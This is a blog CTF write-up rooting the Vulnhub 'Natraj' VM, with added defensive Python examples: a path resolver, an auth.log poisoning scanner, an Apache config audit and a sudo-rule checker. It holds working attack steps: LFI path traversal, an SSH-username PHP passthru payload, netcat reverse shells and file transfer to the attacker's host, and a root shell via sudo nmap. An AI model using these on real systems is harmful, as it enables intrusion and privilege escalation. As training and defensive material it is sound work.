5 December 2022

Pentesting Fun Stuff

following the cyber security path…

Natraj

Introduction

This is a challenge hosted on vulnhub and it’s from hackingarticles.
The description states that Nataraj is a dancing avatar of Hindu God Shiva.
His dance is called Tandava and it is only performed when he is most angry.
Whoever interrupts his dance dies by Shiva while dancing.

It’s a Boot2Root challenge, based on Nataraja.
The goal is to root the machine and find the root flag.

Let’s get started…

Enumeration

As always we start off with a port-scan to get a good view of which ports are open and what services are running behind them.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:9f:da:f4:2e:67:01:92:d5:da:7f:70:d0:06:b3:92 (RSA)
|   256 bc:ea:f1:3b:fa:7c:05:0c:92:95:92:e9:e7:d2:07:71 (ECDSA)
|_  256 f0:24:5b:7a:3b:d6:b7:94:c4:4b:fe:57:21:f8:00:61 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA:Natraj
MAC Address: 00:0C:29:AE:A6:2B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

An SSH-server (port 22) and a web-server (port 80) are running on a Linux machine.
Because SSH needs credentials, I start with the web-server.
Time for Nikto to step in.

---------------------------------------------------------------------------
+ Target IP:          10.0.0.19
+ Target Hostname:    10.0.0.19
+ Target Port:        80
+ Start Time:         2020-06-11 20:43:57 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 38a1, size: 5a72f099ae180, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3268: /console/: Directory indexing found.
+ /console/: Application console found
+ 7889 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2020-06-11 20:44:52 (GMT2) (55 seconds)
---------------------------------------------------------------------------

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:                     http://10.0.0.19
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.0.1
[+] Extensions:              php
[+] Follow Redir:            true
[+] Timeout:                 10s
===============================================================
2020/06/11 20:49:39 Starting gobuster
===============================================================
/images (Status: 200)
/console (Status: 200)
===============================================================
2020/06/11 20:50:30 Finished
===============================================================

Inside the folder /console/ there is an empty php file.
A UDP port-scan also turns up nothing.
The only thing that has come up (without having to sift through all the images in the hope there is some form of steganography) is the empty php file.
When I play a little with parameters, I get a hit.

n0w4n@lab:~/ctf/vulnhub/natraj$ curl -s http://10.0.0.19/console/file.php?cmd=../../../../../../../etc/passwd
n0w4n@lab:~/ctf/vulnhub/natraj$ curl -s http://10.0.0.19/console/file.php?file=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
natraj:x:1000:1000:natraj,,,:/home/natraj:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mahakal:x:1001:1001:,,,:/home/mahakal:/bin/bash

A local file inclusion (LFI).
Let’s check for some interesting files.
First we create a list of files that may give some useful information.

/etc/httpd/logs/acces_log 
/etc/httpd/logs/error_log 
/var/www/logs/access_log 
/var/www/logs/access.log 
/usr/local/apache/logs/access_ log 
/usr/local/apache/logs/access. log 
/var/log/apache/access_log 
/var/log/apache2/access_log 
/var/log/apache/access.log 
/var/log/apache2/access.log
/var/log/access_log
/var/log/auth.log
/home/mahakal/.bash_history
/home/mahakal/.mysql_history
/home/mahakal/.my.cnf
/home/mahakal/.ssh/authorized_keys
/home/mahakal/.ssh/id_rsa
/home/mahakal/.ssh/id_rsa.keystore
/home/mahakal/.ssh/id_rsa.pub
/home/mahakal/.ssh/known_hosts

Then a for loop to iterate over them.

n0w4n@lab:~/ctf/vulnhub/natraj$ for i in $(cat list.txt); do echo -e "[-] $i:\n" && curl -s http://10.0.0.19/console/file.php?file=../../../../../../..$i; done
[-] /etc/httpd/logs/acces_log:

[-] /etc/httpd/logs/error_log:

[-] /var/www/logs/access_log:

[-] /var/www/logs/access.log:

[-] /usr/local/apache/logs/access_:

[-] log:

[-] /usr/local/apache/logs/access.:

[-] log:

[-] /var/log/apache/access_log:

[-] /var/log/apache2/access_log:

[-] /var/log/apache/access.log:

[-] /var/log/apache2/access.log:

[-] /var/log/access_log:

[-] /var/log/auth.log:

Jun  3 09:41:14 ubuntu systemd-logind[434]: New seat seat0.
Jun  3 09:41:14 ubuntu systemd-logind[434]: Watching system buttons on /dev/input/event0 (Power Button)
Jun  3 09:41:15 ubuntu sshd[457]: Server listening on 0.0.0.0 port 22.
Jun  3 09:41:15 ubuntu sshd[457]: Server listening on :: port 22.
Jun  3 09:41:15 ubuntu systemd-logind[434]: Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)
Jun  3 09:41:47 ubuntu sshd[612]: Accepted password for natraj from 192.168.1.103 port 49859 ssh2
Jun  3 09:41:47 ubuntu sshd[612]: pam_unix(sshd:session): session opened for user natraj by (uid=0)
Jun  3 09:41:47 ubuntu systemd-logind[434]: New session 1 of user natraj.
Jun  3 09:41:47 ubuntu systemd: pam_unix(systemd-user:session): session opened for user natraj by (uid=0)
Jun  3 09:41:59 ubuntu sudo:   natraj : TTY=pts/0 ; PWD=/home/natraj ; USER=root ; COMMAND=/bin/bash
Jun  3 09:41:59 ubuntu sudo: pam_unix(sudo:session): session opened for user root by natraj(uid=0)
Jun  3 09:42:01 ubuntu CRON[680]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun  3 09:42:01 ubuntu CRON[680]: pam_unix(cron:session): session closed for user root
Jun  3 09:43:01 ubuntu CRON[684]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun  3 09:43:01 ubuntu CRON[684]: pam_unix(cron:session): session closed for user root
Jun  3 09:43:48 ubuntu sshd[612]: pam_unix(sshd:session): session closed for user natraj
Jun  3 09:43:48 ubuntu sudo: pam_unix(sudo:session): session closed for user root
Jun  3 09:43:48 ubuntu systemd-logind[434]: Removed session 1.
Jun  3 09:44:01 ubuntu CRON[695]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun  3 09:44:01 ubuntu CRON[695]: pam_unix(cron:session): session closed for user root
Jun 11 13:38:36 ubuntu systemd-logind[441]: New seat seat0.
Jun 11 13:38:36 ubuntu systemd-logind[441]: Watching system buttons on /dev/input/event0 (Power Button)
Jun 11 13:38:36 ubuntu sshd[473]: Server listening on 0.0.0.0 port 22.
Jun 11 13:38:36 ubuntu sshd[473]: Server listening on :: port 22.
Jun 11 13:38:37 ubuntu systemd-logind[441]: Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)
Jun 11 13:39:01 ubuntu CRON[704]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 11 13:39:01 ubuntu CRON[705]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 11 13:39:01 ubuntu CRON[704]: pam_unix(cron:session): session closed for user root
Jun 11 13:39:01 ubuntu CRON[705]: pam_unix(cron:session): session closed for user root
Jun 11 13:40:01 ubuntu CRON[799]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 11 13:40:01 ubuntu CRON[799]: pam_unix(cron:session): session closed for user root
Jun 11 13:41:01 ubuntu CRON[802]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 11 13:41:01 ubuntu CRON[802]: pam_unix(cron:session): session closed for user root
Jun 11 13:41:29 ubuntu sshd[805]: Did not receive identification string from 10.0.0.12 port 54986
Jun 11 13:41:37 ubuntu sshd[806]: Protocol major versions differ for 10.0.0.12 port 55014: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 vs. SSH-1.5-NmapNSE_1.0
Jun 11 13:41:37 ubuntu sshd[807]: Protocol major versions differ for 10.0.0.12 port 55016: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 vs. SSH-1.5-Nmap-SSH1-Hostkey
Jun 11 13:41:37 ubuntu sshd[808]: Unable to negotiate with 10.0.0.12 port 55028: no matching host key type found. Their offer: ssh-dss [preauth]
Jun 11 13:41:37 ubuntu sshd[810]: Connection closed by 10.0.0.12 port 55038 [preauth]
Jun 11 13:41:37 ubuntu sshd[812]: Connection closed by 10.0.0.12 port 55044 [preauth]
Jun 11 13:41:37 ubuntu sshd[814]: Unable to negotiate with 10.0.0.12 port 55050: no matching host key type found. Their offer: ecdsa-sha2-nistp384 [preauth]
Jun 11 13:41:37 ubuntu sshd[816]: Unable to negotiate with 10.0.0.12 port 55054: no matching host key type found. Their offer: ecdsa-sha2-nistp521 [preauth]
Jun 11 13:41:37 ubuntu sshd[818]: Connection closed by 10.0.0.12 port 55056 [preauth]
Jun 11 13:42:01 ubuntu CRON[820]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 11 13:42:01 ubuntu CRON[820]: pam_unix(cron:session): session closed for user root

..[SNIP]..

Jun 11 14:30:01 ubuntu CRON[1080]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 11 14:30:01 ubuntu CRON[1080]: pam_unix(cron:session): session closed for user root
[-] /home/mahakal/.bash_history:

[-] /home/mahakal/.mysql_history:

[-] /home/mahakal/.my.cnf:

[-] /home/mahakal/.ssh/authorized_keys:

[-] /home/mahakal/.ssh/id_rsa:

[-] /home/mahakal/.ssh/id_rsa.keystore:

[-] /home/mahakal/.ssh/id_rsa.pub:

[-] /home/mahakal/.ssh/known_hosts:

Looks like I can view the auth.log file.
Maybe something called ‘log poisoning’ is possible.
Log poisoning is a common technique for turning an LFI into code execution and, from there, a reverse shell.
To make this work we need to inject malicious input into a server log (in this case auth.log); sshd writes the username of a failed login to that log verbatim.
When file.php includes the log, PHP parses it as source, so any PHP tags inside the log entry are executed.
In general, if we control the contents of any file the vulnerable web application can reach, we can insert PHP code and load that file through the LFI to execute our code.
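Both the file read above and the log-poisoning step rely on file.php handing the `file` parameter straight to an include. The following is an added example, not the challenge's own file.php (which the page does not show): it places the traversal-prone pattern next to a hardened resolver that canonicalises the path and confirms it stays under the web root, plus the stronger allowlist variant. `WEB_ROOT` and `ALLOWED_PAGES` are constructed values for the demonstration.

```python
"""Path resolution behind a "file=" parameter: the traversal-prone pattern
beside a hardened resolver (added example, not the challenge's file.php)."""
import os
from typing import Optional

# Hypothetical web root for the vulnerable page (constructed for the example).
WEB_ROOT = "/var/www/html/console"
# Pages the handler is actually meant to serve (constructed).
ALLOWED_PAGES = frozenset({"index.php", "help.php"})


def resolve_unsafe(base_dir: str, requested: str) -> str:
    """Mirror of the vulnerable pattern: the parameter is joined onto the base
    path unchanged, so '../' sequences walk out of base_dir and an absolute
    path replaces it entirely (exactly what the passwd read exploited)."""
    return os.path.normpath(os.path.join(base_dir, requested))


def resolve_contained(base_dir: str, requested: str) -> Optional[str]:
    """Canonicalise the candidate and accept it only if it is still inside
    base_dir. Rejects '../' traversal, absolute paths, symlink escapes and
    embedded NUL bytes (the classic include() truncation trick)."""
    if "\x00" in requested:
        return None
    root = os.path.realpath(base_dir)
    try:
        target = os.path.realpath(os.path.join(root, requested))
    except ValueError:  # defensive: some Python versions raise on NUL here
        return None
    # commonpath is the proper containment test; a plain startswith() would
    # wrongly accept "/var/www/html/console-old/x" for root ".../console".
    if target == root or os.path.commonpath([root, target]) != root:
        return None
    return target


def resolve_allowlisted(base_dir: str, requested: str,
                        allowed: frozenset = ALLOWED_PAGES) -> Optional[str]:
    """Strongest fix: only names from a fixed allowlist are ever resolved; the
    containment check still runs afterwards as defence in depth."""
    if requested not in allowed:
        return None
    return resolve_contained(base_dir, requested)


def compare(requested: str) -> dict:
    """Show what each resolver does with one parameter value."""
    return {
        "unsafe": resolve_unsafe(WEB_ROOT, requested),
        "contained": resolve_contained(WEB_ROOT, requested),
        "allowlisted": resolve_allowlisted(WEB_ROOT, requested),
    }


if __name__ == "__main__":
    for value in ("index.php", "../../../../../../../etc/passwd",
                  "/var/log/auth.log", "index.php\x00.txt"):
        print(repr(value), "->", compare(value))
```

Of the three resolvers only the unsafe one ever returns `/etc/passwd` or a log file; the containment check alone already closes the traversal, and the allowlist additionally stops a request for any page the application never intended to expose.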

First let’s poison the log.

n0w4n@lab:~/ctf/vulnhub/natraj$ ssh '<?php passthru($_GET['cmd']); ?>'@10.0.0.19
The authenticity of host '10.0.0.19 (10.0.0.19)' can't be established.
ECDSA key fingerprint is SHA256:LvUVmGWIYBfaqxlxouyJwlU19DzRO0Y9dMcBclxz1zU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.0.19' (ECDSA) to the list of known hosts.
<?php passthru($_GET[cmd]); ?>@10.0.0.19's password: 
Permission denied, please try again.

To make life a bit easier, I run the LFI request not with cURL but in the browser, with Burpsuite in intercept mode.
After Burpsuite intercepts the request, I send it to the repeater in Burpsuite.

To make use of the poisoned log, I add a small piece to the request (the cmd parameter that the injected PHP reads) and run it inside the repeater.

Jun 11 14:40:26 ubuntu sshd[1174]: Failed password for invalid user uid=33(www-data) gid=33(www-data) groups=33(www-data)
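Before the LFI evaluates it, a poisoning attempt is visible in auth.log as a failed SSH login whose "username" contains PHP tags, which is something a defender can alert on long before a web request triggers it. As an added example (not part of the original writeup), here is a small scanner over sshd entries in auth.log; the log lines are constructed in the format shown above, and the two lines with PHP in the username represent the attempt.

```python
"""Scan sshd entries in auth.log for log-poisoning attempts: usernames that
carry PHP open tags or characters no real account name would have.
Added example, not part of the original writeup."""
import re

# Constructed sample in the auth.log format shown above. The two sshd lines
# with PHP in the username are what a poisoning attempt looks like before
# anything evaluates it; the other lines are ordinary noise.
SAMPLE_AUTH_LOG = """\
Jun 11 13:41:37 ubuntu sshd[816]: Unable to negotiate with 10.0.0.12 port 55054: no matching host key type found. Their offer: ecdsa-sha2-nistp521 [preauth]
Jun 11 14:40:26 ubuntu sshd[1174]: Invalid user <?php passthru($_GET[cmd]); ?> from 10.0.0.12 port 50422
Jun 11 14:40:26 ubuntu sshd[1174]: Failed password for invalid user <?php passthru($_GET[cmd]); ?> from 10.0.0.12 port 50422 ssh2
Jun 11 14:41:01 ubuntu sshd[1180]: Failed password for invalid user admin from 10.0.0.12 port 50430 ssh2
Jun 11 14:41:30 ubuntu sshd[1182]: Accepted password for natraj from 192.168.1.103 port 49859 ssh2
Jun 11 14:42:01 ubuntu CRON[1190]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

# sshd messages that echo the client-supplied username back into the log
SSHD_USER_RE = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|(?:Failed|Accepted) \w+ for(?: invalid user)?) "
    r"(?P<user>.*?) from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port (?P<port>\d+)"
)
# PHP open tags (normal, short and legacy <script language="php"> forms)
PHP_TAG_RE = re.compile(r"<\?|<script\b[^>]*language\s*=\s*[\"']?php", re.I)
# Shape of a legitimate POSIX account name
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}\$?$")


def classify_username(user: str):
    """Return a reason string when the username looks like injected content,
    or None when it looks like an ordinary account name."""
    if PHP_TAG_RE.search(user):
        return "php-tag"
    if not USERNAME_RE.match(user):
        return "invalid-username-chars"
    return None


def scan_auth_log(text: str) -> list:
    """One finding per suspicious sshd line: line number, source IP, the raw
    username and why it was flagged."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = SSHD_USER_RE.search(line)
        if not m:
            continue
        reason = classify_username(m.group("user"))
        if reason:
            findings.append({"line": lineno, "src": m.group("src"),
                             "user": m.group("user"), "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in scan_auth_log(SAMPLE_AUTH_LOG):
        print(finding)
```

The username check is deliberately strict: anything that is not a plausible POSIX account name is worth a look, because sshd will log whatever bytes the client sent, and the PHP-tag check is only the most obvious payload shape.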

Now that I know I can execute a command, it’s time to get a reverse shell.

Not working with Python, let’s try Bash.

Not working with Bash, let’s try Netcat (the version without the -e option).

n0w4n@lab:~/ctf/vulnhub/natraj$ nc -lvp 9999
listening on [any] 9999 ...
10.0.0.19: inverse host lookup failed: Host name lookup failure
connect to [10.0.0.12] from (UNKNOWN) [10.0.0.19] 47450
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

And this one works.

$ python -c 'import pty;pty.spawn("/bin/bash");'
/bin/sh: 3: python: not found
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@ubuntu:/var/www/html/console$

Maybe the first try would have succeeded if I used python3.
But access is access…..so who cares.

Time to do some recon on the system.

www-data@ubuntu:/var/www/html/console$ ls -lah /home       
ls -lah /home
total 16K
drwxr-xr-x  4 root    root    4.0K Jun  3 05:36 .
drwxr-xr-x 22 root    root    4.0K Jun  3 04:18 ..
drwxr-xr-x  2 mahakal mahakal 4.0K Jun  3 05:43 mahakal
drwxr-xr-x  4 natraj  natraj  4.0K Jun  3 09:34 natraj
www-data@ubuntu:/var/www/html/console$ ls -lah /home/mahakal
ls -lah /home/mahakal
total 24K
drwxr-xr-x 2 mahakal mahakal 4.0K Jun  3 05:43 .
drwxr-xr-x 4 root    root    4.0K Jun  3 05:36 ..
-rw------- 1 mahakal mahakal    1 Jun  3 09:38 .bash_history
-rw-r--r-- 1 mahakal mahakal  220 Jun  3 05:36 .bash_logout
-rw-r--r-- 1 mahakal mahakal 3.7K Jun  3 05:36 .bashrc
-rw-r--r-- 1 mahakal mahakal  807 Jun  3 05:36 .profile
www-data@ubuntu:/var/www/html/console$ ls -lah /home/natraj
ls -lah /home/natraj
total 36K
drwxr-xr-x 4 natraj natraj 4.0K Jun  3 09:34 .
drwxr-xr-x 4 root   root   4.0K Jun  3 05:36 ..
-rw------- 1 root   root    109 Jun  3 09:43 .bash_history
-rw-r--r-- 1 natraj natraj  220 Jun  3 04:20 .bash_logout
-rw-r--r-- 1 natraj natraj 3.7K Jun  3 04:20 .bashrc
drwx------ 2 natraj natraj 4.0K Jun  3 04:47 .cache
drwx------ 3 natraj natraj 4.0K Jun  3 09:30 .gnupg
-rw-r--r-- 1 natraj natraj  807 Jun  3 04:20 .profile
-rw-r--r-- 1 root   root     66 Jun  3 09:34 .selected_editor
-rw-r--r-- 1 natraj natraj    0 Jun  3 04:47 .sudo_as_admin_successful

– no interesting files with the SUID bit set
– no files with interesting capabilities
– no mail
– no interesting user-owned files
– yes, an interesting world-writable config file

www-data@ubuntu:/home/mahakal$ find / -perm -0007 -type f 2>/dev/null
find / -perm -0007 -type f 2>/dev/null
/etc/apache2/apache2.conf

I need to change the file, but there is no vim or nano, and vi is barely usable.
So the best thing is to transfer it to my local machine.

www-data@ubuntu:/var/www/html/console$ nc -w3 10.0.0.12 9998 < /etc/apache2/apache2.conf
n0w4n@lab:~/ctf/vulnhub/natraj$ nc -lvp 9998 > apache2.conf
listening on [any] 9998 ...
10.0.0.19: inverse host lookup failed: Host name lookup failure
connect to [10.0.0.12] from (UNKNOWN) [10.0.0.19] 55408

The small change I make is here:

# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
User mahakal
Group mahakal

I added the user mahakal to the file.

Why? Apache is normally configured to have access only to its DocumentRoot directory and not to run any system commands.
As such, on most platforms the Apache process runs as an unprivileged user with no login shell (www-data).
This is done for security reasons: even an exploit of a poorly written PHP or Perl script then cannot escalate and cause much harm to the system.
Pointing the User directive at mahakal makes Apache, and every script it runs, execute as that user instead.
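The escalation only works because two things hold at once: the main config is writable by everyone, and the User/Group it ends up with is a real login account. As an added example (not part of the original writeup), the following audit checks both for a given config file. The config fragment, the envvars values and the passwd excerpt are constructed from what the page shows; it assumes Ubuntu's `${APACHE_RUN_USER}` convention and the fact that Apache takes the last User/Group directive it reads.

```python
"""Audit an Apache main config for the two conditions the escalation above
relies on: a file unprivileged users can write, and a User/Group that
resolves to an interactive account. Added example, not from the writeup."""
import os
import re
import stat
import tempfile

# Constructed: the relevant fragment of apache2.conf after the edit above.
SAMPLE_CONFIG = """\
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
User mahakal
Group mahakal
"""
# Constructed: what /etc/apache2/envvars exports on a stock Ubuntu install.
SAMPLE_ENV = {"APACHE_RUN_USER": "www-data", "APACHE_RUN_GROUP": "www-data"}
# Constructed passwd excerpt with the same accounts as the dump above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
natraj:x:1000:1000:natraj,,,:/home/natraj:/bin/bash
mahakal:x:1001:1001:,,,:/home/mahakal:/bin/bash
"""
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def expand_env(value: str, env: dict) -> str:
    """Expand ${NAME} the way Apache does with values from envvars."""
    return re.sub(r"\$\{(\w+)\}", lambda m: env.get(m.group(1), m.group(0)), value)


def effective_user_group(config_text: str, env: dict):
    """Apache applies the last User/Group directive it reads, so a line
    appended at the end silently overrides the one set from envvars."""
    user = group = None
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        directive, arg = parts[0].lower(), expand_env(parts[1].strip(), env)
        if directive == "user":
            user = arg
        elif directive == "group":
            group = arg
    return user, group


def login_shell(user: str, passwd_text: str):
    """Return the account's shell from a passwd dump, or None if unknown."""
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] == user:
            return fields[6]
    return None


def world_writable(path: str) -> bool:
    """True when the 'other' write bit is set on the file."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def audit_config(path: str, env: dict, passwd_text: str) -> dict:
    """Collect the findings for one config file."""
    with open(path, encoding="utf-8") as fh:
        user, group = effective_user_group(fh.read(), env)
    shell = login_shell(user, passwd_text) if user else None
    return {
        "world_writable": world_writable(path),
        "user": user,
        "group": group,
        "interactive_account": shell is not None and shell not in NOLOGIN_SHELLS,
    }


def write_sample_config(mode: int = 0o666) -> str:
    """Write the constructed config to a temp file with the given mode."""
    fd, path = tempfile.mkstemp(suffix=".conf")
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_CONFIG)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    cfg = write_sample_config()
    print(audit_config(cfg, SAMPLE_ENV, SAMPLE_PASSWD))
    os.unlink(cfg)
```

On the sample the audit reports the file as world-writable and the effective user as mahakal with an interactive shell; the same config with the appended lines removed resolves to www-data, whose shell is nologin.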

Now to get the file back.
For this I use the python3 http server module.

Now to reboot the machine, because the changed config only takes effect when Apache restarts, and with my restricted privileges I can’t use any option to gracefully restart or shut down the server.
Luckily it’s a VM I control, but this would be a real problem if the machine were running outside of my reach.

When I reboot the VM, start up the same listener as before and run the same exploit as before (the one in Burpsuite), I get again a reverse shell.
But this time as user mahakal.

n0w4n@lab:~/ctf/vulnhub/natraj$ nc -lvp 9999
listening on [any] 9999 ...
10.0.0.19: inverse host lookup failed: Host name lookup failure
connect to [10.0.0.12] from (UNKNOWN) [10.0.0.19] 34526
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
mahakal@ubuntu:/var/www/html/console$

Let’s check if this user has any superpowers:

mahakal@ubuntu:/home/mahakal$ sudo -l
sudo -l
Matching Defaults entries for mahakal on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mahakal may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/nmap

Running nmap with root-level permissions.

This is never a good idea, because according to GTFObins there is a way to escalate privileges this way.
Nmap can run scripts (NSE, written in Lua) during its scanning process.
Those scripts can come from anywhere.
In this case we’re going to create our own script, which spawns a system shell, and let nmap execute it.
Normally this isn’t a big deal if nmap runs with the permissions of an unprivileged user.
In this case it runs as root…..so you can see where this is going.
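The rule itself is what to catch during a review, and `sudo -l` output is easy to parse. As an added example (not part of the original writeup), this parser reads the output shown above and flags root rules that point at ALL or at a binary with a built-in script engine or shell escape. The `SHELL_CAPABLE` set is an assumption kept to nmap, the binary from this page; a defender would populate it from GTFOBins.

```python
"""Parse `sudo -l` output and flag rules that let a user run, as root, a
binary that can execute arbitrary code. Added example, not from the writeup."""
import os
import re

# The sudo -l output shown above, reused here as the sample input.
SAMPLE_SUDO_L = """\
Matching Defaults entries for mahakal on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User mahakal may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/nmap
"""

# Binaries whose normal features (script engines, shell escapes) turn a root
# sudo rule into a root shell. Assumption: only nmap, the one from this page;
# extend from GTFOBins in real use.
SHELL_CAPABLE = {"nmap"}

# "(runas) TAG: TAG: /path/one, /path/two"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudo_l(text: str) -> list:
    """Return one dict per command in the 'may run the following' section."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        runas = m.group("runas").split(":")[0].strip()   # "(root : root)" -> root
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": runas, "nopasswd": "NOPASSWD" in tags,
                          "command": cmd.strip()})
    return rules


def risky_rules(rules: list) -> list:
    """Rules that run as root and point at ALL or a shell-capable binary,
    with the reason attached; 'nopasswd' tells how cheap the abuse is."""
    out = []
    for r in rules:
        if r["runas"] not in ("root", "ALL"):
            continue
        if r["command"] == "ALL":
            out.append(dict(r, reason="ALL"))
            continue
        exe = os.path.basename(r["command"].split()[0])
        if exe in SHELL_CAPABLE:
            out.append(dict(r, reason=f"{exe} can run arbitrary code"))
    return out


if __name__ == "__main__":
    for r in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(r)
```

Run over the page's output this reports a single rule: nmap as root without a password. Restricting the rule to a wrapper script with fixed arguments, or dropping it in favour of the capabilities nmap actually needs, removes the finding.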

mahakal@ubuntu:/home/mahakal$ TF=$(mktemp)
TF=$(mktemp)
mahakal@ubuntu:/home/mahakal$ echo 'os.execute("/bin/sh")' > $TF
echo 'os.execute("/bin/sh")' > $TF
mahakal@ubuntu:/home/mahakal$ sudo /usr/bin/nmap --script=$TF
sudo /usr/bin/nmap --script=$TF

Starting Nmap 7.60 ( https://nmap.org ) at 2020-06-12 02:50 PDT
NSE: Warning: Loading '/tmp/tmp.NTgHr3ciVw' -- the recommended file extension is '.nse'.
# id
uid=0(root) gid=0(root) groups=0(root)

And there we have a root shell.
Now for the final piece.

uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt



███▄▄▄▄      ▄████████     ███        ▄████████    ▄████████      ▄█ 
███▀▀▀██▄   ███    ███ ▀█████████▄   ███    ███   ███    ███     ███ 
███   ███   ███    ███    ▀███▀▀██   ███    ███   ███    ███     ███ 
